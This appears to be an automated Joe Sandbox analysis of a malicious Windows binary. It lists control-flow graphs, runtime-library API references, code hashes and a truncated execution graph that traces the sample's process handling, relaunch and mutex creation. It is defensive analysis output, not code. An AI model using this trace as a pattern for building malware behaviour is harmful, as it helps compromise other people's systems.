                                                                                                control_flow_graph 595 4a33f16-4a33f2f 596 4a33f31-4a33f3b call 4a35ba8 call 4a34c72 595->596 597 4a33f49-4a33f5e call 4a3bdc0 595->597 604 4a33f40 596->604 597->596 603 4a33f60-4a33f63 597->603 605 4a33f77-4a33f7d 603->605 606 4a33f65 603->606 609 4a33f42-4a33f48 604->609 607 4a33f89-4a33f9a call 4a40504 call 4a401a3 605->607 608 4a33f7f 605->608 610 4a33f67-4a33f69 606->610 611 4a33f6b-4a33f75 call 4a35ba8 606->611 619 4a33fa0-4a33fac call 4a401cd 607->619 620 4a34185-4a3418f call 4a34c9d 607->620 608->611 612 4a33f81-4a33f87 608->612 610->605 610->611 611->604 612->607 612->611 619->620 625 4a33fb2-4a33fbe call 4a401f7 619->625 625->620 628 4a33fc4-4a33fcb 625->628 629 4a3403b-4a34046 call 4a402d9 628->629 630 4a33fcd 628->630 629->609 637 4a3404c-4a3404f 629->637 632 4a33fd7-4a33ff3 call 4a402d9 630->632 633 4a33fcf-4a33fd5 630->633 632->609 638 4a33ff9-4a33ffc 632->638 633->629 633->632 639 4a34051-4a3405a call 4a40554 637->639 640 4a3407e-4a3408b 637->640 642 4a34002-4a3400b call 4a40554 638->642 643 4a3413e-4a34140 638->643 639->640 648 4a3405c-4a3407c 639->648 644 4a3408d-4a3409c call 4a40f40 640->644 642->643 651 4a34011-4a34029 call 4a402d9 642->651 643->609 652 4a340a9-4a340d0 call 4a40e90 call 4a40f40 644->652 653 4a3409e-4a340a6 644->653 648->644 651->609 658 4a3402f-4a34036 651->658 661 4a340d2-4a340db 652->661 662 4a340de-4a34105 call 4a40e90 call 4a40f40 652->662 653->652 658->643 661->662 667 4a34113-4a34122 call 4a40e90 662->667 668 4a34107-4a34110 662->668 671 4a34124 667->671 672 4a3414f-4a34168 667->672 668->667 675 4a34126-4a34128 671->675 676 4a3412a-4a34138 671->676 673 4a3413b 672->673 674 4a3416a-4a34183 672->674 673->643 674->643 675->676 677 4a34145-4a34147 675->677 676->673 677->643 678 4a34149 677->678 678->672 679 4a3414b-4a3414d 678->679 679->643 679->672
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 04A33F51
                                                                                                  • Part of subcall function 04A35BA8: __getptd_noexit.LIBCMT ref: 04A35BA8
                                                                                                • __gmtime64_s.LIBCMT ref: 04A33FEA
                                                                                                • __gmtime64_s.LIBCMT ref: 04A34020
                                                                                                • __gmtime64_s.LIBCMT ref: 04A3403D
                                                                                                • __allrem.LIBCMT ref: 04A34093
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A340AF
                                                                                                • __allrem.LIBCMT ref: 04A340C6
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A340E4
                                                                                                • __allrem.LIBCMT ref: 04A340FB
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A34119
                                                                                                • __invoke_watson.LIBCMT ref: 04A3418A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                • String ID:
                                                                                                • API String ID: 384356119-0
                                                                                                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                • Instruction ID: b59d098abf4006a858b08821cdd0042a364441f97719ce70e6fd69fc023b08c9
                                                                                                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                • Instruction Fuzzy Hash: CD71F671A05B26ABE7149F79CD41B6AB3B8AF54369F148239F914DB6C0F770F9008790

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                • String ID:
                                                                                                • API String ID: 3432600739-0
                                                                                                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                • Instruction ID: 9674ecb36e242fc1e9e1426b2fe2138c97a479091116f98d0e4d3ca2e65d0ae1
                                                                                                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                • Instruction Fuzzy Hash: 0E412672904304BFEB20AFA4DE8079E7BF4AF4871AF10842DF91456190FB75B544DB15

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 744 4a384ab-4a384d9 call 4a38477 749 4a384f3-4a3850b call 4a3158d 744->749 750 4a384db-4a384de 744->750 756 4a38524-4a3855a call 4a3158d * 3 749->756 757 4a3850d-4a3850f 749->757 752 4a384e0-4a384eb call 4a3158d 750->752 753 4a384ed 750->753 752->750 752->753 753->749 769 4a3856b-4a3857e 756->769 770 4a3855c-4a38562 756->770 759 4a38511-4a3851c call 4a3158d 757->759 760 4a3851e 757->760 759->757 759->760 760->756 775 4a38580-4a38587 call 4a3158d 769->775 776 4a3858d-4a38594 769->776 770->769 771 4a38564-4a3856a call 4a3158d 770->771 771->769 775->776 778 4a385a3-4a385ae 776->778 779 4a38596-4a3859d call 4a3158d 776->779 782 4a385b0-4a385bc 778->782 783 4a385cb-4a385cd 778->783 779->778 782->783 785 4a385be-4a385c5 call 4a3158d 782->785 785->783
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ExitProcess___crt
                                                                                                • String ID:
                                                                                                • API String ID: 1022109855-0
                                                                                                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                • Instruction ID: cdd68363b7492a3e815f9fc34f2fb23fc6e754e162ac012a0864c5488f1994ad
                                                                                                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                • Instruction Fuzzy Hash: 4A319332A01250DFDF21AF54FC8484977E4FB18326B04862EF905572B0EBB879C9AF94
                                                                                                APIs
                                                                                                • std::exception::exception.LIBCMT ref: 04A5FC1F
                                                                                                  • Part of subcall function 04A4169C: std::exception::_Copy_str.LIBCMT ref: 04A416B5
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04A5FC34
                                                                                                • std::exception::exception.LIBCMT ref: 04A5FC4D
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04A5FC62
                                                                                                • std::regex_error::regex_error.LIBCPMT ref: 04A5FC74
                                                                                                  • Part of subcall function 04A5F914: std::exception::exception.LIBCMT ref: 04A5F92E
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04A5FC82
                                                                                                • std::exception::exception.LIBCMT ref: 04A5FC9B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04A5FCB0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                • String ID: leM
                                                                                                • API String ID: 3569886845-2926266777
                                                                                                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                • Instruction ID: 86c47049f5493bd7612a2d0816ffa9981d5c4a342e4a7d497ea584d876d30613
                                                                                                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                • Instruction Fuzzy Hash: 4A11BC79C0020DBBCF00FFA5D559CDDBB7CAB44244F408566AD1897641EB74F7988B94
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free_malloc_wprintf$_sprintf
                                                                                                • String ID:
                                                                                                • API String ID: 3721157643-0
                                                                                                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                • Instruction ID: b2ae772d0e3a14ce9a93960d77121892220eae8460548c6ef8edd470bfe59b0f
                                                                                                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                • Instruction Fuzzy Hash: 1111E4B3A045A46AE261A7F55D11EFF7AEC9F49707F0801A9FB8DD1180FA187A0493B1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                • String ID:
                                                                                                • API String ID: 65388428-0
                                                                                                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                • Instruction ID: 80c9c38e70128adddfd98b830a363493d375aa91447397d126255a90fd21ff5a
                                                                                                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                • Instruction Fuzzy Hash: 42515871D40219BBEB10DBA5DD86FEFBBB8FB04744F100125F905B6180EB74AA018BA5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$_memset_sprintf
                                                                                                • String ID:
                                                                                                • API String ID: 217217746-0
                                                                                                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                • Instruction ID: ce3318e9461cf4edb9941b3f7a6bf312caaa507875401df38fcf12689da5bedb
                                                                                                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                • Instruction Fuzzy Hash: 50517EB1E40249AFEF11DFA1DD46FEEBBB8EB44704F100029F915B6190E775BA058BA4
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$_memset_sprintf
                                                                                                • String ID:
                                                                                                • API String ID: 217217746-0
                                                                                                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                • Instruction ID: 797c63a7ccced013ca35a453a0dbe63bb9e39660a436ea53951fa57bdfbf598f
                                                                                                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                • Instruction Fuzzy Hash: 74519271E40249ABEF11DFA1DD45FEEBBB8EB48714F100129F906B6190E67479058BA4
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                • String ID:
                                                                                                • API String ID: 3534693527-0
                                                                                                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                • Instruction ID: f94f04afffb4aabf425f4b402afc8dda39ee5484d2b514b3af99ad257438b556
                                                                                                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                • Instruction Fuzzy Hash: FC31EC73A42215ABFB217F649F0076F67646F05B69F104095FD04EB1A0FB74F9408A91
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: D
                                                                                                • API String ID: 2102423945-2746444292
                                                                                                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                • Instruction ID: a0a9b6d2cf7bf16a68b2cdb69ec9603f7d705be86901528c7655006992cebdab
                                                                                                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                • Instruction Fuzzy Hash: 83E15E72D00229ABDF24DFA4DE49FEEB7B8BF04304F1440A9E509E6190EB74AA45DF54
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: $$$(
                                                                                                • API String ID: 2102423945-3551151888
                                                                                                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                • Instruction ID: 04d2018e81fbd9efafb604e07d0f3d1bddadf99ae2eccdaa8a2758cf50af9f2c
                                                                                                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                • Instruction Fuzzy Hash: F491CE71D04218AAEF20CFA4CD49BEEBBB4AF05308F144169E406772D0DBB67A48CB65
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: p2Q
                                                                                                • API String ID: 2102423945-1521255505
                                                                                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                • Instruction ID: bf64c8f47678796b8d0c3d55826410c6742b2b8568121239751dbfbdf56627e2
                                                                                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                • Instruction Fuzzy Hash: 22F0ED78698750A5F7217750BD26B857E917B31B49F104088E1182E2E1E3FD338CA7AA
                                                                                                APIs
                                                                                                • std::exception::exception.LIBCMT ref: 04A5FBF1
                                                                                                  • Part of subcall function 04A4169C: std::exception::_Copy_str.LIBCMT ref: 04A416B5
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04A5FC06
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                • String ID: TeM$TeM
                                                                                                • API String ID: 3662862379-3870166017
                                                                                                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                • Instruction ID: 2a19475cb2feb944f4b1e13ba3059a3c3e23596e2b831735f8aa9b18527e104c
                                                                                                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                • Instruction Fuzzy Hash: 7ED067B5C0020CBBDB00EFA5D559CDDBBB8AB44348F408466A91497241EA74E7898B94
                                                                                                APIs
                                                                                                  • Part of subcall function 04A3197D: __wfsopen.LIBCMT ref: 04A31988
                                                                                                • _fgetws.LIBCMT ref: 04A1D15C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __wfsopen_fgetws
                                                                                                • String ID:
                                                                                                • API String ID: 853134316-0
                                                                                                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                • Instruction ID: e9b7d646092de2995344ac7e5f75f58eb3bbfca67e6a2ded100bd5da9b00de4d
                                                                                                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                • Instruction Fuzzy Hash: 0991A172D00319ABEF21DFA4CD857EEB7B5BF04304F140529E815A7260E779BA14CB95
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _malloc$__except_handler4_fprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1783060780-0
                                                                                                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                • Instruction ID: 1ab710b7e4234bbac2cbd6a423e080ca0aa1d5f46dd796fba195c28629147b56
                                                                                                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                • Instruction Fuzzy Hash: 16A181B1C00248EBFF11EFE4DD45BDEBB75AF14309F140068E40676291E7B66A58CBA6
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 2974526305-0
                                                                                                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                • Instruction ID: b0db117f92f1cafc3074df7406097985b937e38411daf5226bc8a61eff2e7a6e
                                                                                                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                • Instruction Fuzzy Hash: BC51B436B00305DBDB298F6989807AEB7B5AF50726F2487E9F835962D0F770B950CB50
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                • Instruction ID: 88fbd9ddc5e08679be44f3bfa36d2f923f8971fc2e3b20b40c7c83c3ff7897c5
                                                                                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                • Instruction Fuzzy Hash: B9014B7680014ABBCF525F84DE11DFE3F62BF19364F488515FE9958430D236E5B2AB81
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBCMT ref: 04AD7A4B
                                                                                                  • Part of subcall function 04AD8140: ___BuildCatchObjectHelper.LIBCMT ref: 04AD8172
                                                                                                  • Part of subcall function 04AD8140: ___AdjustPointer.LIBCMT ref: 04AD8189
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 04AD7A62
                                                                                                • ___FrameUnwindToState.LIBCMT ref: 04AD7A74
                                                                                                • CallCatchBlock.LIBCMT ref: 04AD7A98
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 2901542994-0
                                                                                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                • Instruction ID: 2d58f8fe9c4991a2e7394e5cb46121b529238d95d95dbef68448b1e0ecb1e961
                                                                                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                • Instruction Fuzzy Hash: 8501E976000109BBDF12AF55CE00EDA7BBAFF48758F158019FD1966120D736E9A1DBA0

                                                                                                Execution Graph

                                                                                                Execution Coverage:2.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:36%
                                                                                                Total number of Nodes:833
                                                                                                Total number of Limit Nodes:23
                                                                                                execution_graph 38543 4240f6 38544 4240b0 38543->38544 38545 4240b2 38544->38545 38546 42403b 38544->38546 38547 424090 38545->38547 38548 4240b4 38545->38548 38565 4321a1 38546->38565 38846 427c59 58 API calls _doexit 38547->38846 38549 4240c0 38548->38549 38847 427cec 58 API calls _doexit 38548->38847 38848 427c4a 58 API calls _doexit 38549->38848 38555 42405a 38579 427c68 38555->38579 38558 424062 38560 42406d __wwincmdln 38558->38560 38845 427c2e 58 API calls 3 library calls 38558->38845 38559 424095 __write 38585 419f90 38560->38585 38563 424081 38563->38547 38841 427f3d 38563->38841 38566 4321ba _GetLocaleNameFromLanguage 38565->38566 38570 42404f 38565->38570 38849 428c96 38566->38849 38568 43223a 38856 420bed 58 API calls 2 library calls 38568->38856 38570->38555 38844 427c2e 58 API calls 3 library calls 38570->38844 38571 428c96 __calloc_crt 58 API calls 38575 4321e3 _GetLocaleNameFromLanguage 38571->38575 38572 43225f 38857 420bed 58 API calls 2 library calls 38572->38857 38575->38568 38575->38570 38575->38571 38575->38572 38576 432276 38575->38576 38855 42962f 58 API calls __output_l 38575->38855 38858 4242fd 8 API calls 2 library calls 38576->38858 38578 432282 38581 427c74 __IsNonwritableInCurrentImage 38579->38581 38870 43aeb5 38581->38870 38582 427c92 __initterm_e 38584 427cb1 __cinit __IsNonwritableInCurrentImage 38582->38584 38873 4219ac 67 API calls __cinit 38582->38873 38584->38558 38586 419fa0 __write_nolock 38585->38586 38874 40cf10 38586->38874 38588 419fb0 38589 419fc4 GetCurrentProcess GetLastError SetPriorityClass 38588->38589 38590 419fb4 38588->38590 38592 419fe4 GetLastError 38589->38592 38593 419fe6 38589->38593 39098 4124e0 109 API calls _memset 38590->39098 38592->38593 38888 41d3c0 38593->38888 38595 419fb9 38595->38563 38597 41a022 38891 41d340 38597->38891 38598 41b669 39196 44f23e 59 API calls 2 library calls 38598->39196 38600 41b673 39197 44f23e 59 API calls 2 library calls 38600->39197 38605 41a065 38896 413a90 38605->38896 38609 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 38610 41a33d GlobalFree 38609->38610 38625 41a196 38609->38625 38611 41a354 38610->38611 38612 41a45c 38610->38612 38614 412220 76 API calls 38611->38614 38952 412220 38612->38952 38613 41a100 38613->38609 38616 41a359 38614->38616 38618 41a466 38616->38618 38967 40ef50 38616->38967 38617 41a1cc lstrcmpW lstrcmpW 38617->38625 38618->38563 38620 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 38620->38625 38621 41a48f 38624 41a4ef 38621->38624 38972 413ea0 38621->38972 38623 420235 60 API calls _TranslateName 38623->38625 38626 411cd0 92 API calls 38624->38626 38625->38610 38625->38617 38625->38620 38625->38623 38627 41a361 38625->38627 38629 41a563 38626->38629 38912 423c92 38627->38912 38661 41a5db 38629->38661 38993 414690 38629->38993 38631 41a395 OpenProcess 38632 41a402 38631->38632 38633 41a3a9 WaitForSingleObject CloseHandle 38631->38633 38915 411cd0 38632->38915 38633->38632 38638 41a3cb 38633->38638 38634 41a6f9 39100 411a10 8 API calls 38634->39100 38653 41a3e2 GlobalFree 38638->38653 38654 41a3d4 Sleep 38638->38654 39099 411ab0 PeekMessageW DispatchMessageW PeekMessageW 38638->39099 38639 41a6fe 38643 41a8b6 CreateMutexA 38639->38643 38644 41a70f 38639->38644 38640 41a5a9 38641 414690 59 API calls 38640->38641 38646 41a5d4 38641->38646 38642 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 38647 41a451 38642->38647 38649 41a8ca 38643->38649 38648 41a7dc 38644->38648 38657 40ef50 58 API calls 38644->38657 39016 40d240 CoInitialize 38646->39016 38647->38563 38655 40ef50 58 API calls 38648->38655 38652 40ef50 58 API calls 38649->38652 38650 41a624 GetVersion 38650->38634 38656 41a632 lstrcpyW lstrcatW lstrcatW 38650->38656 38665 41a8da 38652->38665 38658 41a3f7 38653->38658 38654->38631 38659 41a7ec 38655->38659 38660 41a674 _memset 38656->38660 38667 41a72f 38657->38667 38658->38563 38662 41a7f1 lstrlenA 38659->38662 38664 41a6b4 ShellExecuteExW 38660->38664 38661->38634 38661->38639 38661->38643 38661->38650 39102 420c62 38662->39102 38664->38639 38685 41a6e3 38664->38685 38665->38665 38668 413ea0 59 API calls 38665->38668 38681 41a92f 38665->38681 38666 41a810 _memset 38669 41a81e MultiByteToWideChar lstrcatW 38666->38669 38667->38667 38670 413ea0 59 API calls 38667->38670 38674 41a780 38667->38674 38668->38665 38669->38662 38671 41a847 lstrlenW 38669->38671 38670->38667 38672 41a8a0 CreateMutexA 38671->38672 38673 41a856 38671->38673 38672->38649 39119 40e760 95 API calls 38673->39119 38676 41a792 38674->38676 38677 41a79c CreateThread 38674->38677 39101 413ff0 59 API calls ___check_float_string 38676->39101 38677->38648 38680 41a7d0 38677->38680 39513 41dbd0 95 API calls 4 library calls 38677->39513 38678 41a860 CreateThread WaitForSingleObject 38678->38672 39514 41e690 185 API calls 8 library calls 38678->39514 38680->38648 39120 415c10 38681->39120 38683 41a98c 39135 412840 60 API calls 38683->39135 38685->38563 38686 41a997 39136 410fc0 93 API calls 4 library calls 38686->39136 38688 41a9ab 38689 41a9c2 lstrlenA 38688->38689 38689->38685 38690 41a9d8 38689->38690 38691 415c10 59 API calls 38690->38691 38692 41aa23 38691->38692 39137 412840 60 API calls 38692->39137 38694 41aa2e lstrcpyA 38696 41aa4b 38694->38696 38697 415c10 59 API calls 38696->38697 38698 41aa90 38697->38698 38699 40ef50 58 API calls 38698->38699 38700 41aaa0 38699->38700 38701 413ea0 59 API calls 38700->38701 38702 41aaf5 38700->38702 38701->38700 39138 413ff0 59 API calls ___check_float_string 38702->39138 38704 41ab1d 39139 412900 38704->39139 38706 41ab28 _memmove 38707 40ef50 58 API calls 38706->38707 38708 41abc5 38707->38708 38709 413ea0 59 API calls 38708->38709 38710 41ac1e 38708->38710 38709->38708 39144 413ff0 59 API calls ___check_float_string 38710->39144 38712 41ac46 38713 412900 60 API calls 38712->38713 38715 41ac51 _memmove 38713->38715 38714 40ef50 58 API calls 38716 41acee 38714->38716 38715->38714 38717 413ea0 59 API calls 